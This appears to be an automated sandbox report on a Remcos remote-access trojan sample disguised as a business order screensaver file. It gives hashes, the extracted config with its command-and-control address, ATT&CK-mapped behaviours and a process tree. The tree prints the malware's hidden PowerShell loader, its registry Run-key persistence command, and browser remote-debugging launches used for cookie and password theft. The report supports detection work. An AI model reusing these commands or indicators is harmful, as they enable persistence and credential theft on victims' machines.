remcos | a29216211bcb3b0aed63eefe2fdf5c84669b2a330058658090588c2289fd11ea

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
11-12-2024 13:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Company Profile and new order-202401127.scr
Size

457KB
MD5

d04078498be29acaa68b55111f851331
SHA1

9076e89beb922d1ee190986adcf3e2892b8b5a6b
SHA256

a29216211bcb3b0aed63eefe2fdf5c84669b2a330058658090588c2289fd11ea
SHA512

e7eb6932566a7c7e7336d61004e39289490f32586e989a640facd9eaa440b3f203c194d0d715716e3ba57055b269f50dbb694f13e86c275417382491a40d45a1
SSDEEP

6144:3bE/HU+kGuh+YScuFadNvtpYOHeQtF3pkKtURQ390Ly3ciaL4yN2gtOQV1hB398:3bytu3S6FP318w9D37yN2+1h

Score

10^/10

remcos amg-aku collection credential_access discovery execution persistence rat stealer

Malware Config

Extracted

Family

remcos

Botnet

AMG-AKU

87.120.116.240:64650

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-7VHMSA
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/3560-94-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/2672-95-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/3704-101-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/3560-94-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/2672-95-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1572	powershell.exe

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
968	Chrome.exe
324	msedge.exe
3508	Chrome.exe
2876	Chrome.exe
3284	msedge.exe
4992	msedge.exe
2176	msedge.exe
3392	msedge.exe
4328	Chrome.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Untroubledness = "%Modtrykket% -windowstyle 1 $Opinionatedness=(gp -Path 'HKCU:\\Software\\Nicenian\\').Brandskatningernes;%Modtrykket% ($Opinionatedness)"	reg.exe

Blocklisted process makes network request 7 IoCs

flow	pid	Process
17	4816	msiexec.exe
19	4816	msiexec.exe
23	4816	msiexec.exe
26	4816	msiexec.exe
31	4816	msiexec.exe
32	4816	msiexec.exe
33	4816	msiexec.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
4816	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1572	powershell.exe
4816	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4816 set thread context of 2672	4816	msiexec.exe	97
PID 4816 set thread context of 3560	4816	msiexec.exe	98
PID 4816 set thread context of 3704	4816	msiexec.exe	100

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Fonts\fremfringers\aquamanale.ini	Company Profile and new order-202401127.scr

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Company Profile and new order-202401127.scr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4644	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
2672	msiexec.exe
2672	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
3704	msiexec.exe
3704	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
3508	Chrome.exe
3508	Chrome.exe
2672	msiexec.exe
2672	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
1572	powershell.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe
4816	msiexec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe
3284	msedge.exe

Suspicious use of AdjustPrivilegeToken 39 IoCs

description	pid	Process
Token: SeDebugPrivilege	1572	powershell.exe
Token: SeIncreaseQuotaPrivilege	1572	powershell.exe
Token: SeSecurityPrivilege	1572	powershell.exe
Token: SeTakeOwnershipPrivilege	1572	powershell.exe
Token: SeLoadDriverPrivilege	1572	powershell.exe
Token: SeSystemProfilePrivilege	1572	powershell.exe
Token: SeSystemtimePrivilege	1572	powershell.exe
Token: SeProfSingleProcessPrivilege	1572	powershell.exe
Token: SeIncBasePriorityPrivilege	1572	powershell.exe
Token: SeCreatePagefilePrivilege	1572	powershell.exe
Token: SeBackupPrivilege	1572	powershell.exe
Token: SeRestorePrivilege	1572	powershell.exe
Token: SeShutdownPrivilege	1572	powershell.exe
Token: SeDebugPrivilege	1572	powershell.exe
Token: SeSystemEnvironmentPrivilege	1572	powershell.exe
Token: SeRemoteShutdownPrivilege	1572	powershell.exe
Token: SeUndockPrivilege	1572	powershell.exe
Token: SeManageVolumePrivilege	1572	powershell.exe
Token: 33	1572	powershell.exe
Token: 34	1572	powershell.exe
Token: 35	1572	powershell.exe
Token: 36	1572	powershell.exe
Token: SeDebugPrivilege	3704	msiexec.exe
Token: SeShutdownPrivilege	3508	Chrome.exe
Token: SeCreatePagefilePrivilege	3508	Chrome.exe
Token: SeShutdownPrivilege	3508	Chrome.exe
Token: SeCreatePagefilePrivilege	3508	Chrome.exe
Token: SeShutdownPrivilege	3508	Chrome.exe
Token: SeCreatePagefilePrivilege	3508	Chrome.exe
Token: SeShutdownPrivilege	3508	Chrome.exe
Token: SeCreatePagefilePrivilege	3508	Chrome.exe
Token: SeShutdownPrivilege	3508	Chrome.exe
Token: SeCreatePagefilePrivilege	3508	Chrome.exe
Token: SeShutdownPrivilege	3508	Chrome.exe
Token: SeCreatePagefilePrivilege	3508	Chrome.exe
Token: SeShutdownPrivilege	3508	Chrome.exe
Token: SeCreatePagefilePrivilege	3508	Chrome.exe
Token: SeShutdownPrivilege	3508	Chrome.exe
Token: SeCreatePagefilePrivilege	3508	Chrome.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
3508	Chrome.exe
3284	msedge.exe
3284	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4816	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4000 wrote to memory of 1572	4000	Company Profile and new order-202401127.scr	82
PID 4000 wrote to memory of 1572	4000	Company Profile and new order-202401127.scr	82
PID 4000 wrote to memory of 1572	4000	Company Profile and new order-202401127.scr	82
PID 1572 wrote to memory of 4816	1572	powershell.exe	89
PID 1572 wrote to memory of 4816	1572	powershell.exe	89
PID 1572 wrote to memory of 4816	1572	powershell.exe	89
PID 1572 wrote to memory of 4816	1572	powershell.exe	89
PID 4816 wrote to memory of 1708	4816	msiexec.exe	90
PID 4816 wrote to memory of 1708	4816	msiexec.exe	90
PID 4816 wrote to memory of 1708	4816	msiexec.exe	90
PID 1708 wrote to memory of 4644	1708	cmd.exe	92
PID 1708 wrote to memory of 4644	1708	cmd.exe	92
PID 1708 wrote to memory of 4644	1708	cmd.exe	92
PID 4816 wrote to memory of 3508	4816	msiexec.exe	95
PID 4816 wrote to memory of 3508	4816	msiexec.exe	95
PID 3508 wrote to memory of 2424	3508	Chrome.exe	96
PID 3508 wrote to memory of 2424	3508	Chrome.exe	96
PID 4816 wrote to memory of 2672	4816	msiexec.exe	97
PID 4816 wrote to memory of 2672	4816	msiexec.exe	97
PID 4816 wrote to memory of 2672	4816	msiexec.exe	97
PID 4816 wrote to memory of 2672	4816	msiexec.exe	97
PID 4816 wrote to memory of 3560	4816	msiexec.exe	98
PID 4816 wrote to memory of 3560	4816	msiexec.exe	98
PID 4816 wrote to memory of 3560	4816	msiexec.exe	98
PID 4816 wrote to memory of 3560	4816	msiexec.exe	98
PID 4816 wrote to memory of 3712	4816	msiexec.exe	99
PID 4816 wrote to memory of 3712	4816	msiexec.exe	99
PID 4816 wrote to memory of 3712	4816	msiexec.exe	99
PID 4816 wrote to memory of 3704	4816	msiexec.exe	100
PID 4816 wrote to memory of 3704	4816	msiexec.exe	100
PID 4816 wrote to memory of 3704	4816	msiexec.exe	100
PID 4816 wrote to memory of 3704	4816	msiexec.exe	100
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 5072	3508	Chrome.exe	101
PID 3508 wrote to memory of 4404	3508	Chrome.exe	102
PID 3508 wrote to memory of 4404	3508	Chrome.exe	102

C:\Users\Admin\AppData\Local\Temp\Company Profile and new order-202401127.scr
"C:\Users\Admin\AppData\Local\Temp\Company Profile and new order-202401127.scr" /S
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4000
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -windowstyle hidden "$Skrpende=Get-Content -Raw 'C:\Users\Admin\AppData\Roaming\Livskvalitetens214\oime\Samfundsordenen.enn';$manienie=$Skrpende.SubString(52708,3);.$manienie($Skrpende)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1572
- - C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\SysWOW64\msiexec.exe"
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4816
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Untroubledness" /t REG_EXPAND_SZ /d "%Modtrykket% -windowstyle 1 $Opinionatedness=(gp -Path 'HKCU:\Software\Nicenian\').Brandskatningernes;%Modtrykket% ($Opinionatedness)"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1708
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Untroubledness" /t REG_EXPAND_SZ /d "%Modtrykket% -windowstyle 1 $Opinionatedness=(gp -Path 'HKCU:\Software\Nicenian\').Brandskatningernes;%Modtrykket% ($Opinionatedness)"
        5⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:4644
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:3508
    - - C:\Program Files\Google\Chrome\Application\Chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffec617cc40,0x7ffec617cc4c,0x7ffec617cc58
        5⤵
        
        PID:2424
    - - C:\Program Files\Google\Chrome\Application\Chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1936,i,3926517624434682838,14158568631277807905,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1928 /prefetch:2
        5⤵
        
        PID:5072
    - - C:\Program Files\Google\Chrome\Application\Chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2020,i,3926517624434682838,14158568631277807905,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2000 /prefetch:3
        5⤵
        
        PID:4404
    - - C:\Program Files\Google\Chrome\Application\Chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,3926517624434682838,14158568631277807905,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2432 /prefetch:8
        5⤵
        
        PID:1936
    - - C:\Program Files\Google\Chrome\Application\Chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,3926517624434682838,14158568631277807905,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4328
    - - C:\Program Files\Google\Chrome\Application\Chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,3926517624434682838,14158568631277807905,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3216 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:968
    - - C:\Program Files\Google\Chrome\Application\Chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4604,i,3926517624434682838,14158568631277807905,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4652 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2876
  - - C:\Windows\SysWOW64\msiexec.exe
      C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\kjldmhlxqrwzpwdkoiunmqqqcjayxulo"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2672
  - - C:\Windows\SysWOW64\msiexec.exe
      C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\vdrw"
      4⤵
      Accesses Microsoft Outlook accounts
      System Location Discovery: System Language Discovery
      PID:3560
  - - C:\Windows\SysWOW64\msiexec.exe
      C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\fxwhnsg"
      4⤵
      PID:3712
  - - C:\Windows\SysWOW64\msiexec.exe
      C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\fxwhnsg"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3704
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Modifies registry class
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:3284
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffec60346f8,0x7ffec6034708,0x7ffec6034718
        5⤵
        
        PID:2268
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,3470202383610449017,14146439337981131750,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
        5⤵
        
        PID:2868
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,3470202383610449017,14146439337981131750,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
        5⤵
        
        PID:2904
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,3470202383610449017,14146439337981131750,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
        5⤵
        
        PID:1584
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2212,3470202383610449017,14146439337981131750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:324
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2212,3470202383610449017,14146439337981131750,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4992
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2212,3470202383610449017,14146439337981131750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3852 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2176
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2212,3470202383610449017,14146439337981131750,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3392

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1172

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3408

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

T1556

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Authentication Process

T1556

Modify Registry

T1112

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
7bc096814306d9fb3a41df0b67025a14

SHA1
3c9155d4651ad1ba149b1ef839ef7c5b4e993512

SHA256
3a98e2dfb444ca64b59247ce3292187a0e92dabb2e1fa80084e6a507604332e6

SHA512
84e3fa352a67df6d7d8eaf12fbd07a201f478e0b571b227742ff2ce1049d357b9c1bc05cf8b54ef96bfdfc22dc3024fe676588135bcfea92eff404a9d04e629a

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
cb20297fbc848a98cce1dfa98ad91ff0

SHA1
231342815c4819b2a4ce62e809161e32484c1537

SHA256
381ee4dd0ea819a3ef007fa1c6d2b1fe205470259df5c45d4aed02dbffcfb894

SHA512
7497ebdc06756845935f3b102040756c2412f07038270f772cff9e0934c3ac61d2d1b952af99779ea3a7e10000d2b7e3a55ce0bd91dd4f4cc5130c0affec536c

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
0bca34311c8278df1cb6f9da5feabd69

SHA1
b81fb684f4221180a6d0187d3c57426c52fd9e0d

SHA256
186b359c1e6053807fac9356b377cc0fe08a0f7d11526ffb484757bbd7156b6a

SHA512
c1c0c914b6135dcc08379e1e35c840880338b5a89af14ce33d00648618133406f2f71a0baa3371a21d82e1841e0d169055efc132447aee4a9552efb7145f5748

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
5bd4a757d0b2c99d8da35a6405d4b7e3

SHA1
ccfeb70cd6d3e1f6a17cf8fa267922bba979630b

SHA256
